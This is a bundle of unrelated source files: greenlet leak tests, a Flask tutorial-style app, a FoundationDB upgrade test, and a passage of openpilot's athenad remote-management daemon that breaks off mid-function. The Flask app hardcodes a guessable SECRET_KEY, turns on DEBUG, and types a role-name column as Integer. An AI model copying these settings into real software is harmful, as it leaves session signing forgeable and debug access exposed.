greenlet.getcurrent() # update ts_current
gc.collect()
greenlet.getcurrent() # update ts_current
gc.collect()
greenlet.getcurrent() # update ts_current
for g in gg:
self.assertTrue(g() is None)
def test_threaded_adv_leak(self):
gg = []
def worker():
# main and additional *finished* greenlets
ll = greenlet.getcurrent().ll = []
def additional():
ll.append(greenlet.getcurrent())
for i in range(2):
greenlet.greenlet(additional).switch()
gg.append(weakref.ref(greenlet.getcurrent()))
for i in range(2):
t = threading.Thread(target=worker)
t.start()
t.join()
del t
greenlet.getcurrent() # update ts_current
gc.collect()
greenlet.getcurrent() # update ts_current
gc.collect()
greenlet.getcurrent() # update ts_current
for g in gg:
self.assertTrue(g() is None)
|
hello.py
|
from flask import Flask, render_template, url_for, session, redirect, request
from flask_bootstrap import Bootstrap
from flask_script import Manager, Command, Shell
from flask_moment import Moment
from datetime import datetime
from flask_wtf import Form
from wtforms import StringField, BooleanField, SubmitField, PasswordField
from wtforms.validators import DataRequired, EqualTo
from wtforms.validators import Email as is_an_email_address
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate, MigrateCommand
from flask_mail import Mail, Message
from threading import Thread
import os
base_dir = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
app.config['DEBUG'] = True
app.config['SECRET_KEY'] = 'This is a very hard to guess key'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + \
os.path.join(base_dir, 'data.sqlite')
app.config['MAIL_SERVER'] = 'smtp.googlemail.com'
app.config['MAIL_PORT'] = 587
app.config['MAIL_USE_TLS'] = True
app.config['MAIL_USERNAME'] = os.environ.get('MAIL_USERNAME')
app.config['MAIL_PASSWORD'] = os.environ.get('MAIL_PASSWORD')
app.config['FLASK_ADMIN'] = os.environ.get('FLASK_ADMIN')
app.config['FLASK_SUBJECT_PREFIX'] = 'Flasky - '
app.config['MAIL_DEFAULT_SENDER'] = app.config['MAIL_USERNAME']
bootstrap = Bootstrap(app)
manager = Manager(app)
moment = Moment(app)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
mail = Mail(app)
def send_mail(to, subject, template, **kwargs):
msg = Message(app.config['FLASK_SUBJECT_PREFIX'] + subject, recipients=[to])
msg.html = render_template(template + '.html', **kwargs)
msg.body = render_template(template + '.txt', **kwargs)
thr = Thread(target=async_send_mail, name='send_mail', args=(app, msg))
thr.start()
return thr
def async_send_mail(app, msg):
with app.app_context():
mail.send(msg)
class NameForm(Form):
# email = StringField("Please input your email.", validators=[DataRequired(),
# is_an_email_address()])
# password = PasswordField("Input your password.", validators=[DataRequired(),
# EqualTo('password_confirm', "The password looks like not the same.")])
# password_confirm = PasswordField("Confirm your password.", validators=[
# DataRequired()])
username = StringField("Please input your name.", validators=[DataRequired()])
submit = SubmitField("Submit")
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Integer, unique=True)
users = db.relationship('User', backref='role', lazy='dynamic')
@staticmethod
def insert_roles():
roles = ['Administrator', 'Moderator', 'User']
for role in roles:
r = Role.query.filter_by(name=role).first()
if r is None:
r = Role(name=role)
db.session.add(r)
db.session.commit()
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), unique=True, index=True)
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
@app.route('/', methods=['GET', 'POST'])
def index():
form = NameForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user is None:
session['known'] = False
user = User(username=form.username.data)
db.session.add(user)
db.session.commit()
send_mail(app.config['FLASK_ADMIN'], 'New user', 'new_user', user=user)
else:
session['known'] = True
session['username'] = form.username.data
form.username.data = ''
return redirect(url_for('index'))
return render_template('index.html', form=form, known=session.get('known', False),
username=session.get('username'))
@app.route('/user/<username>')
def user(username):
return render_template('user.html', username=username)
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
def make_shell_context():
return dict(app=app, db=db, User=User, Role=Role)
manager.add_command('shell', Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
manager.run()
|
upgrade_test.py
|
#!/usr/bin/env python3
from argparse import ArgumentParser, RawDescriptionHelpFormatter
import glob
import os
from pathlib import Path
import platform
import random
import shutil
import stat
import subprocess
import sys
from threading import Thread, Event
import traceback
import time
from urllib import request
import hashlib
from local_cluster import LocalCluster, random_secret_string
SUPPORTED_PLATFORMS = ["x86_64"]
SUPPORTED_VERSIONS = [
"7.2.0",
"7.1.5",
"7.1.4",
"7.1.3",
"7.1.2",
"7.1.1",
"7.1.0",
"7.0.0",
"6.3.24",
"6.3.23",
"6.3.22",
"6.3.18",
"6.3.17",
"6.3.16",
"6.3.15",
"6.3.13",
"6.3.12",
"6.3.9",
"6.2.30",
"6.2.29",
"6.2.28",
"6.2.27",
"6.2.26",
"6.2.25",
"6.2.24",
"6.2.23",
"6.2.22",
"6.2.21",
"6.2.20",
"6.2.19",
"6.2.18",
"6.2.17",
"6.2.16",
"6.2.15",
"6.2.10",
"6.1.13",
"6.1.12",
"6.1.11",
"6.1.10",
"6.0.18",
"6.0.17",
"6.0.16",
"6.0.15",
"6.0.14",
"5.2.8",
"5.2.7",
"5.1.7",
"5.1.6",
]
CLUSTER_ACTIONS = ["wiggle"]
FDB_DOWNLOAD_ROOT = "https://github.com/apple/foundationdb/releases/download/"
LOCAL_OLD_BINARY_REPO = "/opt/foundationdb/old/"
CURRENT_VERSION = "7.2.0"
HEALTH_CHECK_TIMEOUT_SEC = 5
PROGRESS_CHECK_TIMEOUT_SEC = 30
TESTER_STATS_INTERVAL_SEC = 5
TRANSACTION_RETRY_LIMIT = 100
MAX_DOWNLOAD_ATTEMPTS = 5
RUN_WITH_GDB = False
def make_executable_path(path):
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IEXEC)
def remove_file_no_fail(filename):
try:
os.remove(filename)
except OSError:
pass
def version_from_str(ver_str):
ver = [int(s) for s in ver_str.split(".")]
assert len(ver) == 3, "Invalid version string {}".format(ver_str)
return ver
def api_version_from_str(ver_str):
ver_tuple = version_from_str(ver_str)
return ver_tuple[0] * 100 + ver_tuple[1] * 10
def version_before(ver_str1, ver_str2):
return version_from_str(ver_str1) < version_from_str(ver_str2)
def random_sleep(min_sec, max_sec):
time_sec = random.uniform(min_sec, max_sec)
print("Sleeping for {0:.3f}s".format(time_sec))
time.sleep(time_sec)
def compute_sha256(filename):
hash_function = hashlib.sha256()
with open(filename, "rb") as f:
while True:
data = f.read(128 * 1024)
if not data:
break
hash_function.update(data)
return hash_function.hexdigest()
def read_to_str(filename):
with open(filename, "r") as f:
return f.read()
class UpgradeTest:
def __init__(
self,
args
):
self.build_dir = Path(args.build_dir).resolve()
assert self.build_dir.exists(), "{} does not exist".format(args.build_dir)
assert self.build_dir.is_dir(), "{} is not a directory".format(args.build_dir)
self.upgrade_path = args.upgrade_path
self.used_versions = set(self.upgrade_path).difference(set(CLUSTER_ACTIONS))
for version in self.used_versions:
assert version in SUPPORTED_VERSIONS, "Unsupported version or cluster action {}".format(version)
self.platform = platform.machine()
assert self.platform in SUPPORTED_PLATFORMS, "Unsupported platform {}".format(
self.platform
)
self.tmp_dir = self.build_dir.joinpath("tmp", random_secret_string(16))
self.tmp_dir.mkdir(parents=True)
self.download_dir = self.build_dir.joinpath("tmp", "old_binaries")
self.local_binary_repo = Path(LOCAL_OLD_BINARY_REPO)
if not self.local_binary_repo.exists():
self.local_binary_repo = None
self.download_old_binaries()
self.create_external_lib_dir()
init_version = self.upgrade_path[0]
self.cluster = LocalCluster(
self.tmp_dir,
self.binary_path(init_version, "fdbserver"),
self.binary_path(init_version, "fdbmonitor"),
self.binary_path(init_version, "fdbcli"),
args.process_number,
create_config=False,
redundancy=args.redundancy
)
self.cluster.create_cluster_file()
self.configure_version(init_version)
self.log = self.cluster.log
self.etc = self.cluster.etc
self.data = self.cluster.data
self.input_pipe_path = self.tmp_dir.joinpath(
"input.{}".format(random_secret_string(8))
)
self.output_pipe_path = self.tmp_dir.joinpath(
"output.{}".format(random_secret_string(8))
)
os.mkfifo(self.input_pipe_path)
os.mkfifo(self.output_pipe_path)
self.progress_event = Event()
self.api_version = None
self.tester_retcode = None
self.tester_proc = None
self.output_pipe = None
self.tester_bin = None
self.ctrl_pipe = None
# Check if the binaries for the given version are available in the local old binaries repository
def version_in_local_repo(self, version):
return (self.local_binary_repo is not None) and (self.local_binary_repo.joinpath(version).exists())
def binary_path(self, version, bin_name):
if version == CURRENT_VERSION:
return self.build_dir.joinpath("bin", bin_name)
elif self.version_in_local_repo(version):
return self.local_binary_repo.joinpath(version, "bin", "{}-{}".format(bin_name, version))
else:
return self.download_dir.joinpath(version, bin_name)
def lib_dir(self, version):
if version == CURRENT_VERSION:
return self.build_dir.joinpath("lib")
else:
return self.download_dir.joinpath(version)
# Download an old binary of a given version from a remote repository
def download_old_binary(
self, version, target_bin_name, remote_bin_name, make_executable
):
local_file = self.download_dir.joinpath(version, target_bin_name)
if local_file.exists():
return
# Download to a temporary file and then replace the target file atomically
# to avoid consistency errors in case of multiple tests are downloading the
# same file in parallel
local_file_tmp = Path("{}.{}".format(str(local_file), random_secret_string(8)))
self.download_dir.joinpath(version).mkdir(parents=True, exist_ok=True)
remote_file = "{}{}/{}".format(FDB_DOWNLOAD_ROOT, version, remote_bin_name)
remote_sha256 = "{}.sha256".format(remote_file)
local_sha256 = Path("{}.sha256".format(local_file_tmp))
for attempt_cnt in range(MAX_DOWNLOAD_ATTEMPTS + 1):
if attempt_cnt == MAX_DOWNLOAD_ATTEMPTS:
assert False, "Failed to download {} after {} attempts".format(
local_file_tmp, MAX_DOWNLOAD_ATTEMPTS
)
try:
print("Downloading '{}' to '{}'...".format(remote_file, local_file_tmp))
request.urlretrieve(remote_file, local_file_tmp)
print("Downloading '{}' to '{}'...".format(remote_sha256, local_sha256))
request.urlretrieve(remote_sha256, local_sha256)
print("Download complete")
except Exception as e:
print("Retrying on error:", e)
continue
assert local_file_tmp.exists(), "{} does not exist".format(local_file_tmp)
assert local_sha256.exists(), "{} does not exist".format(local_sha256)
expected_checksum = read_to_str(local_sha256)
actual_checkum = compute_sha256(local_file_tmp)
if expected_checksum == actual_checkum:
print("Checksum OK")
break
print(
"Checksum mismatch. Expected: {} Actual: {}".format(
expected_checksum, actual_checkum
)
)
os.rename(local_file_tmp, local_file)
os.remove(local_sha256)
if make_executable:
make_executable_path(local_file)
# Copy a client library file from the local old binaries repository
# The file needs to be renamed to libfdb_c.so, because it is loaded with this name by fdbcli
def copy_clientlib_from_local_repo(self, version):
dest_lib_file = self.download_dir.joinpath(version, "libfdb_c.so")
if dest_lib_file.exists():
return
# Avoid race conditions in case of parallel test execution by first copying to a temporary file
# and then renaming it atomically
dest_file_tmp = Path("{}.{}".format(str(dest_lib_file), random_secret_string(8)))
src_lib_file = self.local_binary_repo.joinpath(version, "lib", "libfdb_c-{}.so".format(version))
assert src_lib_file.exists(), "Missing file {} in the local old binaries repository".format(src_lib_file)
self.download_dir.joinpath(version).mkdir(parents=True, exist_ok=True)
shutil.copyfile(src_lib_file, dest_file_tmp)
os.rename(dest_file_tmp, dest_lib_file)
assert dest_lib_file.exists(), "{} does not exist".format(dest_lib_file)
# Download all old binaries required for testing the specified upgrade path
def download_old_binaries(self):
for version in self.used_versions:
if version == CURRENT_VERSION:
continue
if self.version_in_local_repo(version):
self.copy_clientlib_from_local_repo(version)
continue
self.download_old_binary(
version, "fdbserver", "fdbserver.{}".format(self.platform), True
)
self.download_old_binary(
version, "fdbmonitor", "fdbmonitor.{}".format(self.platform), True
)
self.download_old_binary(
version, "fdbcli", "fdbcli.{}".format(self.platform), True
)
self.download_old_binary(
version, "libfdb_c.so", "libfdb_c.{}.so".format(self.platform), False
)
# Create a directory for external client libraries for MVC and fill it
# with the libraries necessary for the specified upgrade path
def create_external_lib_dir(self):
self.external_lib_dir = self.tmp_dir.joinpath("client_libs")
self.external_lib_dir.mkdir(parents=True)
for version in self.used_versions:
src_file_path = self.lib_dir(version).joinpath("libfdb_c.so")
assert src_file_path.exists(), "{} does not exist".format(src_file_path)
target_file_path = self.external_lib_dir.joinpath(
"libfdb_c.{}.so".format(version)
)
shutil.copyfile(src_file_path, target_file_path)
# Perform a health check of the cluster: Use fdbcli status command to check if the number of
# server processes and their versions are as expected
def health_check(self, timeout_sec=HEALTH_CHECK_TIMEOUT_SEC):
retries = 0
while retries < timeout_sec:
retries += 1
status = self.cluster.get_status()
if "processes" not in status["cluster"]:
print("Health check: no processes found. Retrying")
time.sleep(1)
continue
num_proc = len(status["cluster"]["processes"])
if num_proc != self.cluster.process_number:
print(
"Health check: {} of {} processes found. Retrying".format(
num_proc, self.cluster.process_number
)
)
time.sleep(1)
continue
for (_, proc_stat) in status["cluster"]["processes"].items():
proc_ver = proc_stat["version"]
assert (
proc_ver == self.cluster_version
), "Process version: expected: {}, actual: {}".format(
self.cluster_version, proc_ver
)
print("Health check: OK")
return
assert False, "Health check: Failed"
# Create and save a cluster configuration for the given version
def configure_version(self, version):
self.cluster.fdbmonitor_binary = self.binary_path(version, "fdbmonitor")
self.cluster.fdbserver_binary = self.binary_path(version, "fdbserver")
self.cluster.fdbcli_binary = self.binary_path(version, "fdbcli")
self.cluster.set_env_var = "LD_LIBRARY_PATH", self.lib_dir(version)
if version_before(version, "7.1.0"):
self.cluster.use_legacy_conf_syntax = True
self.cluster.save_config()
self.cluster_version = version
# Upgrade the cluster to the given version
def upgrade_to(self, version):
print("Upgrading to version {}".format(version))
self.cluster.stop_cluster()
self.configure_version(version)
self.cluster.ensure_ports_released()
self.cluster.start_cluster()
print("Upgraded to {}".format(version))
def __enter__(self):
print("Starting cluster version {}".format(self.cluster_version))
self.cluster.start_cluster()
self.cluster.create_database(enable_tenants=False)
return self
def __exit__(self, xc_type, exc_value, traceback):
self.cluster.stop_cluster()
shutil.rmtree(self.tmp_dir)
# Determine FDB API version matching the upgrade path
def determine_api_version(self):
self.api_version = api_version_from_str(CURRENT_VERSION)
for version in self.used_versions:
self.api_version = min(api_version_from_str(version), self.api_version)
# Start the tester to generate the workload specified by the test file
def exec_workload(self, test_file):
self.tester_retcode = 1
try:
self.determine_api_version()
cmd_args = [
self.tester_bin,
"--cluster-file",
self.cluster.cluster_file,
"--test-file",
test_file,
"--external-client-dir",
self.external_lib_dir,
"--disable-local-client",
"--input-pipe",
self.input_pipe_path,
"--output-pipe",
self.output_pipe_path,
"--api-version",
str(self.api_version),
"--log",
"--log-dir",
self.log,
"--tmp-dir",
self.tmp_dir,
"--transaction-retry-limit",
str(TRANSACTION_RETRY_LIMIT),
"--stats-interval",
str(TESTER_STATS_INTERVAL_SEC*1000)
]
if RUN_WITH_GDB:
cmd_args = ["gdb", "-ex", "run", "--args"] + cmd_args
print(
"Executing test command: {}".format(
" ".join([str(c) for c in cmd_args])
)
)
self.tester_proc = subprocess.Popen(
cmd_args, stdout=sys.stdout, stderr=sys.stderr
)
self.tester_retcode = self.tester_proc.wait()
self.tester_proc = None
if self.tester_retcode != 0:
print("Tester failed with return code {}".format(self.tester_retcode))
except Exception:
print("Execution of test workload failed")
print(traceback.format_exc())
finally:
# If the tester failed to initialize, other threads of the test may stay
# blocked on trying to open the named pipes
if self.ctrl_pipe is None or self.output_pipe is None:
print("Tester failed before initializing named pipes. Aborting the test")
os._exit(1)
# Perform a progress check: Trigger it and wait until it is completed
def progress_check(self):
self.progress_event.clear()
os.write(self.ctrl_pipe, b"CHECK\n")
self.progress_event.wait(None if RUN_WITH_GDB else PROGRESS_CHECK_TIMEOUT_SEC)
if self.progress_event.is_set():
print("Progress check: OK")
else:
assert False, "Progress check failed after upgrade to version {}".format(
self.cluster_version
)
# The main function of a thread for reading and processing
# the notifications received from the tester
def output_pipe_reader(self):
try:
print("Opening pipe {} for reading".format(self.output_pipe_path))
self.output_pipe = open(self.output_pipe_path, "r")
for line in self.output_pipe:
msg = line.strip()
print("Received {}".format(msg))
if msg == "CHECK_OK":
self.progress_event.set()
self.output_pipe.close()
except Exception as e:
print("Error while reading output pipe", e)
print(traceback.format_exc())
# Execute the upgrade test workflow according to the specified
# upgrade path: perform the upgrade steps and check success after each step
def exec_upgrade_test(self):
print("Opening pipe {} for writing".format(self.input_pipe_path))
self.ctrl_pipe = os.open(self.input_pipe_path, os.O_WRONLY)
try:
self.health_check()
self.progress_check()
random_sleep(0.0, 2.0)
for entry in self.upgrade_path[1:]:
if entry == "wiggle":
self.cluster.cluster_wiggle()
else:
assert entry in self.used_versions, "Unexpected entry in the upgrade path: {}".format(entry)
self.upgrade_to(entry)
self.health_check()
self.progress_check()
os.write(self.ctrl_pipe, b"STOP\n")
finally:
os.close(self.ctrl_pipe)
# Kill the tester process if it is still alive
def kill_tester_if_alive(self, workload_thread):
if not workload_thread.is_alive():
return
if self.tester_proc is not None:
try:
print("Killing the tester process")
self.tester_proc.kill()
workload_thread.join(5)
except Exception:
print("Failed to kill the tester process")
# The main method implementing the test:
# - Start a thread for generating the workload using a tester binary
# - Start a thread for reading notifications from the tester
# - Trigger the upgrade steps and checks in the main thread
def exec_test(self, args):
self.tester_bin = self.build_dir.joinpath("bin", "fdb_c_api_tester")
assert self.tester_bin.exists(), "{} does not exist".format(self.tester_bin)
self.tester_proc = None
test_retcode = 1
try:
workload_thread = Thread(target=self.exec_workload, args=(args.test_file,))
workload_thread.start()
reader_thread = Thread(target=self.output_pipe_reader)
reader_thread.start()
self.exec_upgrade_test()
test_retcode = 0
except Exception:
print("Upgrade test failed")
print(traceback.format_exc())
self.kill_tester_if_alive(workload_thread)
finally:
workload_thread.join(5)
reader_thread.join(5)
self.kill_tester_if_alive(workload_thread)
if test_retcode == 0:
test_retcode = self.tester_retcode
return test_retcode
def grep_logs_for_events(self, severity):
return (
subprocess.getoutput(
"grep -r 'Severity=\"{}\"' {}".format(
severity, self.cluster.log.as_posix()
)
)
.rstrip()
.splitlines()
)
# Check the cluster log for errors
def check_cluster_logs(self, error_limit=100):
sev40s = (
subprocess.getoutput(
"grep -r 'Severity=\"40\"' {}".format(self.cluster.log.as_posix())
)
.rstrip()
.splitlines()
)
err_cnt = 0
for line in sev40s:
# When running ASAN we expect to see this message. Boost coroutine should be using the
# correct asan annotations so that it shouldn't produce any false positives.
if line.endswith(
"WARNING: ASan doesn't fully support makecontext/swapcontext functions and may produce false "
"positives in some cases! "
):
continue
if err_cnt < error_limit:
print(line)
err_cnt += 1
if err_cnt > 0:
print(
">>>>>>>>>>>>>>>>>>>> Found {} severity 40 events - the test fails",
err_cnt,
)
else:
print("No errors found in logs")
return err_cnt == 0
# Check the server and client logs for warnings and dump them
def dump_warnings_in_logs(self, limit=100):
sev30s = (
subprocess.getoutput(
"grep -r 'Severity=\"30\"' {}".format(self.cluster.log.as_posix())
)
.rstrip()
.splitlines()
)
if len(sev30s) == 0:
print("No warnings found in logs")
else:
print(
">>>>>>>>>>>>>>>>>>>> Found {} severity 30 events (warnings):".format(
len(sev30s)
)
)
for line in sev30s[:limit]:
print(line)
# Dump the last cluster configuration and cluster logs
def dump_cluster_logs(self):
for etc_file in glob.glob(os.path.join(self.cluster.etc, "*")):
print(">>>>>>>>>>>>>>>>>>>> Contents of {}:".format(etc_file))
with open(etc_file, "r") as f:
print(f.read())
for log_file in glob.glob(os.path.join(self.cluster.log, "*")):
print(">>>>>>>>>>>>>>>>>>>> Contents of {}:".format(log_file))
with open(log_file, "r") as f:
print(f.read())
if __name__ == "__main__":
parser = ArgumentParser(
formatter_class=RawDescriptionHelpFormatter,
description="""
A script for testing FDB multi-version client in upgrade scenarios. Creates a local cluster,
generates a workload using fdb_c_api_tester with a specified test file, and performs
cluster upgrade according to the specified upgrade path. Checks if the workload successfully
progresses after each upgrade step.
""",
)
parser.add_argument(
"--build-dir",
"-b",
metavar="BUILD_DIRECTORY",
help="FDB build directory",
required=True,
)
parser.add_argument(
"--upgrade-path",
nargs="+",
help="Cluster upgrade path: a space separated list of versions.\n" +
"The list may also contain cluster change actions: {}".format(CLUSTER_ACTIONS),
default=[CURRENT_VERSION],
)
parser.add_argument(
"--test-file",
help="A .toml file describing a test workload to be generated with fdb_c_api_tester",
required=True,
)
parser.add_argument(
"--process-number",
"-p",
help="Number of fdb processes running (default: 0 - random)",
type=int,
default=0,
)
parser.add_argument(
"--redundancy",
help="Database redundancy level (default: single)",
type=str,
default="single",
)
parser.add_argument(
"--disable-log-dump",
help="Do not dump cluster log on error",
action="store_true",
)
parser.add_argument(
"--run-with-gdb", help="Execute the tester binary from gdb", action="store_true"
)
args = parser.parse_args()
if args.process_number == 0:
args.process_number = random.randint(1, 5)
print("Testing with {} processes".format(args.process_number))
assert len(args.upgrade_path) > 0, "Upgrade path must be specified"
assert args.upgrade_path[0] in SUPPORTED_VERSIONS, "Upgrade path begin with a valid version number"
if args.run_with_gdb:
RUN_WITH_GDB = True
errcode = 1
with UpgradeTest(args) as test:
print("log-dir: {}".format(test.log))
print("etc-dir: {}".format(test.etc))
print("data-dir: {}".format(test.data))
print("cluster-file: {}".format(test.etc.joinpath("fdb.cluster")))
errcode = test.exec_test(args)
if not test.check_cluster_logs():
errcode = 1 if errcode == 0 else errcode
test.dump_warnings_in_logs()
if errcode != 0 and not args.disable_log_dump:
test.dump_cluster_logs()
sys.exit(errcode)
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
import selfdrive.crash as crash
from selfdrive.version import dirty, origin, branch, commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = set([8022])
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id'])
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event)),
threading.Thread(target=ws_send, args=(ws, end_event)),
threading.Thread(target=upload_handler, args=(end_event,)),
threading.Thread(target=log_handler, args=(end_event,)),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,))
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "result" in data and "id" in data:
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
while not end_event.is_set():
try:
item = upload_queue.get(timeout=1)
if item.id in cancelled_uploads:
cancelled_uploads.remove(item.id)
continue
_do_upload(item)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=10)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def listDataDirectory():
files = [os.path.relpath(os.path.join(dp, f), ROOT) for dp, dn, fn in os.walk(ROOT) for f in fn]
return files
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
return [item._asdict() for item in list(upload_queue.queue)]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# return logs in order they should be sent
# excluding most recent (active) log file
return sorted(logs[:-1])
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
log_retries = 0
while not end_event.is_set():
try:
try:
result = json.loads(log_recv_queue.get(timeout=1))
log_success = result.get("success")
log_entry = result.get("id")
log_path = os.path.join(SWAGLOG_DIR, log_entry)
if log_entry and log_success:
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
except queue.Empty:
pass
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# never send last log file because it is the active log
# and only send one log file at a time (most recent first)
if not len(log_files) or not log_send_queue.empty():
continue
log_entry = log_files.pop()
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path, "r") as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
except OSError:
pass # file could be deleted by log rotation
log_retries = 0
except Exception:
cloudlog.exception("athena.log_handler.exception")
log_retries += 1
if log_retries != 0:
time.sleep(backoff(log_retries))
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
ssock.close()
local_sock.close()
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
